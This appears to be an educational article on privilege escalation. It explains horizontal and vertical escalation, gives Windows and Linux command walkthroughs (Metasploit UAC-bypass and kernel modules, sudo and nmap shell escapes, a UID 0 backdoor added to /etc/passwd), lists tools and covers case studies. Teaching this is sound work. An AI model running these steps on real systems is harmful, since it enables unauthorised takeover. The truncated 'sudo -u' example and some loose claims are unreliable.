A privilege escalation attack is a type of cyberattack in which an attacker gains unauthorized access to elevated rights, permissions, entitlements, or privileges beyond those originally assigned to a user, account, identity, or machine.

Privilege escalation is a critical phase in the cyberattack chain and often involves exploiting vulnerabilities such as system bugs, misconfigurations, or weak access controls. By leveraging these weaknesses, attackers can move laterally within a system, gain administrative control, or access sensitive data.

Aim of Privilege Escalation

When we exploit a machine, we usually land as:

• Normal/Restricted User: Very limited actions.
• Administrator (Windows) / Sudo User (Linux): Higher privileges, but still not ultimate.

Our goal is to escalate further to SYSTEM (Windows) or root (Linux).

• NT AUTHORITY/SYSTEM = the most powerful account in Windows (even more than Admin).
• root = the superuser in Linux with total control over files, processes, and users.

Only at this level can we:

• Dump password hashes
• Disable security tools
• Persist on the system
• Move laterally in a network

Types Of Privilege Escalation

There are two main types of privilege escalation:

1. Horizontal Privilege Escalation

Horizontal privilege escalation is when an attacker doesn’t become an admin but instead sneaks into another user’s account at the same privilege level, letting them see or use data and resources they shouldn’t normally have access to.

Example (Web Application Based)

Imagine an online banking system where users can view their account details at this URL:

https://bank.com/account?user_id=1234

If a user manually changes the URL to:

https://bank.com/account?user_id=1235

and is able to view another customer's account data without any authentication or authorization checks.

2. Vertical Privilege Escalation

An attacker can exploit vertical privilege escalation to elevate access from a standard user account to higher-level privileges, such as those of an administrator or superuser. This escalation grants the attacker unrestricted control over the system, enabling them to modify critical configurations, install unauthorized software, create new privileged user accounts, and even delete or manipulate essential data. Such access can severely compromise system integrity, security, and availability.

Example

The sudo command in Linux allows users to run commands with elevated privileges (usually as the root user). It’s tightly controlled through the sudoers configuration file, which defines what users are allowed to do.

sudo -u

This spawned a root shell, bypassing the restriction entirely.

Common Methods of Privilege Escalation

This is essentially a list of common methods or attack vectors for privilege escalation in cybersecurity. It explains how attackers use technical flaws, user mistakes, or system weaknesses to move from limited access to higher-level privileges (like admin or root).

1. Social Engineering

Attackers manipulate or trick users into revealing sensitive information like passwords or performing actions that grant access. Common methods include phishing emails that impersonate trusted sources to steal credentials, allowing attackers to escalate privileges.

2. Pass-the-Hash / Rainbow Table Attacks

Instead of cracking passwords, attackers use stolen password hashes to authenticate and impersonate users on the network. This bypasses password entry and can give access to sensitive systems if proper protections aren’t in place.

3. Vulnerabilities and Exploits

Attackers exploit software bugs, unpatched vulnerabilities, or buffer overflows to execute malicious code with higher privileges. These flaws allow attackers to bypass normal security controls and gain elevated system access.

4. Misconfigurations

Improperly set permissions, weak passwords, or exposed services create opportunities for attackers to escalate privileges. For example, an unsecured open port or excessive user permissions can be exploited to gain higher access.

5. Kernel Exploits

Attackers exploit vulnerabilities in the operating system kernel, the core component controlling hardware and processes. Since the kernel runs with the highest privileges, these exploits can give attackers full control of the system, bypassing all security measures.

Windows Escalation Paths

When we exploit or get into the windows machine these are the most common escalation paths:

1. UAC Bypass – User Account Control (UAC) in Windows prompts for confirmation when actions require elevated privileges. However, weak or misconfigured UAC settings allow attackers with local administrator rights to bypass these prompts and directly obtain SYSTEM-level privileges.

Practical Use Case

An attacker lands as a local admin but cannot perform privileged actions due to UAC prompts. By exploiting weak UAC settings, they elevate privileges without user approval.

Step 1: Check current user & privileges

whoami
whoami /priv

Step 2: Look for UAC bypass opportunities

meterpreter > getuid        # Shows current session user

Step 3: If you’re a local admin but blocked by UAC prompts, try bypass:

use exploit/windows/local/bypassuac
set session 1
run
getuid

2. Kernel Exploits – The Windows kernel runs with the highest system privileges. Vulnerabilities in the kernel or device drivers allow attackers to execute arbitrary code as SYSTEM, bypassing normal restrictions.

Practical Use Case

A low-privileged user enumerates OS version and finds it unpatched. A public exploit (like MS16-032) can escalate them to SYSTEM.

Step1: Check for Kernel exploits (if system is unpatched)

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Step2: After Identify OS version and patch level. Use the command in Metasploit:

search exploit/windows/local
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set session 1
run

3. Misconfigurations – If a service’s executable file or configuration has weak permissions, attackers can replace or reconfigure it. Once restarted, the service executes the malicious binary with SYSTEM privileges.

Practical Use Case

A low-privileged user finds a service binary writable. They replace it with a malicious payload. Restarting the service results in SYSTEM-level access.

Step 1: Look for Service misconfigurations

sc qc <service_name>         # Service config
icacls "C:\path\to\service.exe"  # Check file permissions

Step 2: If service binary is writable → replace it with malicious EXE.

net stop <service_name>
net start <service_name>

Linux Escalation Paths

When we exploit or gain access to a Linux machine, these are the most common escalation paths:

1. Sudo Misconfigurations: If a user can run certain commands with sudo without providing a password, or if wildcards/unsafe binaries are allowed, it can lead to root privilege escalation.

Practical Use Case:
An attacker has a low-privileged shell. By checking sudo -l, they find a misconfigured command like sudo vim or sudo find, which allows privilege escalation.

Steps:

sudo -l  
sudo vim -c ':!/bin/sh'  
sudo find / -exec /bin/sh \; -quit

2. SUID/SGID Binaries

Definition: Binaries with the SUID/SGID bit run with the privileges of the file owner (often root). Misconfigured or exploitable SUID binaries can provide root access.

Practical Use Case:
A low-privileged user finds /usr/bin/nmap with SUID bit set. They can launch a root shell via the interactive mode.

Steps:

find / -perm -4000 2>/dev/null  
nmap --interactive
!sh

3. Exploiting Kernel Vulnerabilities

Definition: Just like in Windows, an outdated Linux kernel may contain privilege escalation vulnerabilities (e.g., Dirty COW - CVE-2016-5195).

Practical Use Case:
Attacker finds kernel version is old. They download and compile a public exploit to escalate privileges.

Steps:

uname -a  
searchsploit linux kernel | grep <version>  
gcc exploit.c -o exploit
./exploit

4. Writable /etc/passwd or /etc/shadow

Definition: If /etc/passwd or /etc/shadow files are writable, attackers can insert a new root user or replace the root hash.

Practical Use Case:
Attacker modifies /etc/passwd to add a new user with UID 0 (root).

Steps:

openssl passwd -1 Pass@123
$1$zIIO5omx$CM5gSOR4/Jq7SUUieEI6T1  
backdoor:$1$zIIO5omx$CM5gSOR4/Jq7SUUieEI6T1:0:0:root:/root:/bin/bash
su backdoor

Tools Used in Privilege Escalation

There is a list of tools commonly used by security professionals and attackers alike:

• Metasploit : A powerful framework for developing and executing exploits, including many for privilege escalation on multiple platforms.
• Mimikatz : Extracts plaintext passwords, hashes, and tokens from Windows memory to facilitate credential theft and privilege escalation.
• PowerUp : A PowerShell tool used to identify and exploit common Windows misconfigurations for privilege escalation.
• WinPEAS : Automates scanning for privilege escalation vectors on Windows systems by checking for misconfigurations and vulnerabilities.
• BloodHound : Maps Active Directory relationships to find paths for privilege escalation and lateral movement within Windows networks.
• LinPEAS : Automates detection of common Linux privilege escalation paths by scanning system configurations and binaries.
• Linux Exploit Suggester : Analyzes kernel version and system info to recommend applicable local privilege escalation exploits.
• GTFOBins : A curated list of Linux binaries that can be abused by attackers to bypass restrictions and escalate privileges.
• Cobalt Strike : A commercial tool used for advanced threat emulation and post-exploitation, including privilege escalation capabilities.

Case Study Examples of Privilege Escalation Attack

Here are several real-world examples of privilege escalation attacks covering both vertical and horizontal escalation:

1. Microsoft Windows PrintNightmare (CVE-2021-34527)

A vertical privilege escalation occurs when a vulnerability allows a user with limited permissions to gain higher-level access, such as system or administrator rights. For example, a flaw in a service like the Windows Print Spooler can let standard users run code with SYSTEM privileges. This elevated access enables attackers to perform critical actions, including installing software, modifying data, or creating privileged accounts. Such vulnerabilities pose serious security risks by compromising the entire system’s integrity.

2. Facebook User IDOR (2015)

In the Facebook User IDOR (2015) vulnerability, an attacker discovered that by simply changing the user ID number in the URL of a request, they could access private information belonging to other users. This happened because the application failed to properly verify whether the requesting user was authorized to view the data associated with the specified user ID.

3. Instagram Account Takeover (2019)

Attackers exploited a weakness in the account recovery process by systematically guessing the recovery PIN codes. This flaw allowed them to bypass authentication and gain access to other users’ accounts without needing elevated privileges.

4. Zoom Mac Exploit (2020)

Attackers took advantage of the Zoom installer’s use of scripts that ran with root privileges. By manipulating these scripts, they were able to execute malicious code on the system with administrator-level access, bypassing normal security controls.

5. Windows Sticky Keys

In the Windows Sticky Keys Backdoor technique, an attacker with physical or low-level access replaces the Sticky Keys executable (sethc.exe) with cmd.exe. When the Sticky Keys shortcut (pressing Shift five times at the login screen) is triggered, a command prompt opens with SYSTEM-level privileges, allowing full control of the system without logging in.